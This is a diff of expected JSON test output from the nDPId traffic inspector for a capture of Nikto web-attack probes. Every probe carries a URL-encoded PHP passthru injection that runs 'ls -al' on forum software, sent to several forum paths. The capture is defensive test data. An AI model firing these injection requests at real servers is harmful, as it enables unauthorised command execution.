 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"ts_msec":1576420277834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_packet_id":1,"flow_last_seen":1576420277834,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"ts_msec":1576420277834,"pkt":"AAAAAAAAAAAAAAAACABFAAFtY1BAAEAG2Dh\/AAABfwAAAccgH5CMmFp9naENboAYAED\/YQAAAQEICp1m\/3KdZv9yR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="}
-01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"ts_msec":1576420277834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
+01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"ts_msec":1576420277834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":1576420277836,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_packet_id":1,"flow_last_seen":1576420277836,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"ts_msec":1576420277836,"pkt":"AAAAAAAAAAAAAAAACABFAAFPP1dAAEAG\/E9\/AAABfwAAAcciH5AaoQZne4dTBYAYAED\/QwAAAQEICp1m\/3OdZv9zR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-01004{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":1576420277836,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}}
+01193{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":1576420277836,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"ts_msec":1576420277838,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_packet_id":1,"flow_last_seen":1576420277838,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":358,"pkt_l4_len":324,"ts_msec":1576420277838,"pkt":"AAAAAAAAAAAAAAAACABFAAFY3j1AAEAGXWB\/AAABfwAAAcckH5DNwecJcN6f0YAYAED\/TAAAAQEICp1m\/3adZv92R0VUIC9wb3N0bnVrZS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-01014{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"ts_msec":1576420277838,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}}
+01203{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"ts_msec":1576420277838,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"ts_msec":1576420277840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00869{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_packet_id":1,"flow_last_seen":1576420277840,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"ts_msec":1576420277840,"pkt":"AAAAAAAAAAAAAAAACABFAAFdmNpAAEAGor5\/AAABfwAAAccmH5CDpKHt6Uk16IAYAED\/UQAAAQEICp1m\/3idZv93R0VUIC9wb3N0bnVrZS9odG1sL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-01020{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"ts_msec":1576420277840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}}
+01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"ts_msec":1576420277840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7440000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"ts_msec":1576420277841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00861{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_packet_id":1,"flow_last_seen":1576420277841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"ts_msec":1576420277841,"pkt":"AAAAAAAAAAAAAAAACABFAAFXf1lAAEAGvEV\/AAABfwAAAccoH5A3NUZkeJaOS4AYAED\/SwAAAQEICp1m\/3mdZv95R0VUIC9tb2R1bGVzL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-01013{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7440000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"ts_msec":1576420277841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}}
+01202{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7440000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"ts_msec":1576420277841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7440000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"ts_msec":1576420277843,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_packet_id":1,"flow_last_seen":1576420277843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":355,"pkt_l4_len":321,"ts_msec":1576420277843,"pkt":"AAAAAAAAAAAAAAAACABFAAFV4EBAAEAGW2B\/AAABfwAAAccqH5AAS9kLhsuzOIAYAED\/SQAAAQEICp1m\/3udZv96R0VUIC9waHBCQi92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQoNCg=="}
-01011{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7440000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"ts_msec":1576420277843,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}}
+01200{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7440000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"ts_msec":1576420277843,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7440000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"ts_msec":1576420277844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00861{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_packet_id":1,"flow_last_seen":1576420277844,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":355,"pkt_l4_len":321,"ts_msec":1576420277844,"pkt":"AAAAAAAAAAAAAAAACABFAAFVVuFAAEAG5L9\/AAABfwAAAccsH5DRJG\/rOSfatoAYAED\/SQAAAQEICp1m\/3ydZv98R0VUIC9mb3J1bS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-01011{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7440000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"ts_msec":1576420277844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}}
